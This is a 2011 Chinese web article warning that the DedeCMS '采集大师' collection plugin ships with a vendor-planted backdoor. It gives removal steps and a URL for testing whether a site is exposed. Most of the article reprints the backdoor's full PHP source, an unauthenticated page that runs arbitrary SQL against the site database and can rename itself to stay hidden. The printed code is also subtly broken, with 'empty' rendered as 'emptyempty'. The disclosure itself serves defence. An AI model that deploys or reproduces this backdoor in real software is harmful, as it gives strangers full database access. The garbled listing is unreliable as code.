DEDE采集大師官方留后門的刪除辦法

更新時(shí)間：2011年01月08日 00:03:07 作者：

說實(shí)話，會(huì)故意留后門的程序，最好的方法就是別用。這個(gè)后門被發(fā)現(xiàn)了，天知道下一個(gè)所謂的新版本還會(huì)不會(huì)冒出更多的后門來。

去除官方后門方法：安裝好采集大師后，請立即刪除 include目錄下的dedesql.query.php文件，如已經(jīng)安裝過，有可能文件已被改名為arc.sqlquery.class.php，找到并刪除即可。此文件可被利用來在無需登錄驗(yàn)證的情況下查詢網(wǎng)站數(shù)據(jù)庫，并進(jìn)行更新、刪除、查詢數(shù)據(jù)等操作。大家也可以自己測試一下是否如我所說，方法：
http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo
輸入以上網(wǎng)址，即可打開后門界面。
說實(shí)話，會(huì)故意留后門的程序，最好的方法就是別用。這個(gè)后門被發(fā)現(xiàn)了，天知道下一個(gè)所謂的新版本還會(huì)不會(huì)冒出更多的后門來。此后門文件代碼如下：

復(fù)制代碼代碼如下:

 
<?php 
require_once(dirname(__FILE__)."/../include/common.inc.php"); 
if(emptyempty($dopost)) 
{ 
$dopost = ""; 
} 
if($dopost=="rename") 
{ 
if(rename('dedesql.query.php','arc.sqlquery.class.php')){ 
echo "成功！"; 
}else{ 
echo "失??！"; 
} 
exit(); 
} 
if($dopost=="viewinfo") 
{ 
if(emptyempty($tablename)) 
{ 
echo "沒有指定表名！"; 
} 
else 
{ 
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); 
$dsql->Execute('me'); 
$row2 = $dsql->GetArray('me',MYSQL_BOTH); 
$ctinfo = $row2[1]; 
echo "<xmp>".trim($ctinfo)."</xmp>"; 
} 
exit(); 
} 
if($dopost=="index") 
{ 
require_once(DEDEINC.'/arc.partview.class.php'); 
$envs = $_sys_globals = array(); 
$envs['aid'] = 0; 
$pv = new PartView(); 
$row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); 
$templet = str_replace("{style}",$cfg_df_style,$row['templet']); 
$homeFile = dirname(__FILE__).'/'.$row['position']; 
$homeFile = str_replace("http://","/",str_replace("\\","/",$homeFile)); 
$fp = fopen($homeFile,'w') or die("無法更新網(wǎng)站主頁到：$homeFile 位置"); 
fclose($fp); 
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; 
$pv->SetTemplet($tpl); 
$pv->SaveToHtml($homeFile); 
$pv->Close(); 
echo "成功更新首頁！"; 
exit(); 
} 
else if($dopost=="query") 
{ 
$sqlquery = trim(stripslashes($sqlquery)); 
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) 
{ 
echo "<span style='font-size:10pt'>刪除'數(shù)據(jù)表'或'數(shù)據(jù)庫'的語句不允許在這里執(zhí)行。</span>"; 
exit(); 
} 
if(eregi("^select ",$sqlquery)) 
{ 
$dsql->SetQuery($sqlquery); 
$dsql->Execute(); 
if($dsql->GetTotalRow()<=0) 
{ 
echo "運(yùn)行SQL：{$sqlquery}，無返回記錄！"; 
} 
else 
{ 
echo "運(yùn)行SQL：{$sqlquery}，共有".$dsql->GetTotalRow()."條記錄，最大返回100條！"; 
} 
$j = 0; 
while($row = $dsql->GetArray()) 
{ 
$j++; 
if($j>100) 
{ 
break; 
} 
echo "<hr size=1 width='100%'/>"; 
echo "記錄：$j"; 
echo "<hr size=1 width='100%'/>"; 
foreach($row as $k=>$v) 
{ 
echo "<font color='red'>{$k}：</font>{$v}<br/>\r\n"; 
} 
} 
exit(); 
} 
if($querytype==2) 
{ 
$sqlquery = str_replace("\r","",$sqlquery); 
$sqls = split(";[ \t]{0,}\n",$sqlquery); 
$nerrCode = "";$i=0; 
foreach($sqls as $q) 
{ 
$q = trim($q); 
if($q=="") 
{ 
continue; 
} 
$dsql->ExecuteNoneQuery($q); 
$errCode = trim($dsql->GetError()); 
if($errCode=="") 
{ 
$i++; 
} 
else 
{ 
$nerrCode .= "執(zhí)行： <font color='blue'>$q</font> 出錯(cuò)，錯(cuò)誤提示：<font color='red'>".$errCode."</font><br>"; 
} 
} 
echo "成功執(zhí)行{$i}個(gè)SQL語句！<br><br>"; 
echo $nerrCode; 
} 
else 
{ 
$dsql->ExecuteNoneQuery($sqlquery); 
$nerrCode = trim($dsql->GetError()); 
echo "成功執(zhí)行1個(gè)SQL語句！<br><br>"; 
echo $nerrCode; 
} 
exit(); 
} 
if($dopost=="view") 
{ 
;echo '<html> 
<head> 
<meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> 
<title>SQL命令行工具</title> 
<link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> 
</head> 
<body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> 
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> 
<tr> 
<td height="19" background="img/tbg.gif"> 
<table width="96%" border="0" cellspacing="1" cellpadding="1"> 
<tr> 
<td width="24%"><strong>SQL命令運(yùn)行器：</strong></td> 
<td width="76%" align="right"> <b><a href="sys_data.php"><u>數(shù)據(jù)備份</u></a></b> 
| <b><a href="sys_data_revert.php"><strong><u>數(shù)據(jù)還原</u></strong></a></b> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
<tr> 
<td height="200" bgcolor="#FFFFFF" valign="top"> 
<table width="100%" border="0" cellspacing="4" cellpadding="2"> 
<form action="" method="post" name="infoform" target="stafrm"> 
<input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> 
<tr bgcolor="#F3FBEC"> 
<td width="15%" height="24" align="center">系統(tǒng)的表信息：</td> 
<td> 
<table width="100%" border="0" cellspacing="0" cellpadding="0"> 
<tr> 
<td width="35%"> 
<select name="tablename" id="tablename" style="width:100%" size="6"> 
'; 
$dsql->SetQuery("Show Tables"); 
$dsql->Execute('t'); 
while($row = $dsql->GetArray('t',MYSQL_BOTH)) 
{ 
$dsql->SetQuery("Select count(*) From ".$row[0]); 
$dsql->Execute('n'); 
$row2 = $dsql->GetArray('n',MYSQL_BOTH); 
$dd = $row2[0]; 
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; 
} 
;echo ' </select> 
</td> 
<td width="2%">&nbsp;</td> 
<td width="63%" valign="bottom"> 
<div style="float:left;margin-right:20px;"> 
<input type="Submit" name="Submit1" value="優(yōu)化選中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> 
<br /> 
<input type="Submit" name="Submit2" value="修復(fù)選中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> 
<br /> 
<input type="Submit" name="Submit3" value="查看表結(jié)構(gòu)" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> 
</div> 
<div style="float:left"> 
<input type="Submit" name="Submit5" value="優(yōu)化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> 
<br /> 
<input type="Submit" name="Submit6" value="修復(fù)全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> 
</div> 
</td> 
</tr> 
</table></td> 
</tr> 
<tr> 
<td height="200" align="center">返回信息：</td> 
<td> 
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> 
</td> 
</tr> 
</form> 
<form action="" method="post" name="form1" target="stafrm"> 
<input type=\'hidden\' name=\'dopost\' value=\'query\'> 
<tr> 
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>運(yùn)行SQL命令行： 
<input name="querytype" type="radio" class="np" value="0"> 
單行命令（支持簡單查詢） 
<input name="querytype" type="radio" class="np" value="2" checked> 
多行命令</strong></td> 
</tr> 
<tr> 
<td height="118" colspan="2"> 
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> 
</td> 
</tr> 
<tr> 
<td height="53" align="center">&nbsp;</td> 
<td> 
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> 
</td> 
</tr> 
</form> 
</table> 
</td> 
</tr> 
</table> 
</body> 
</html> 
';} 
?> 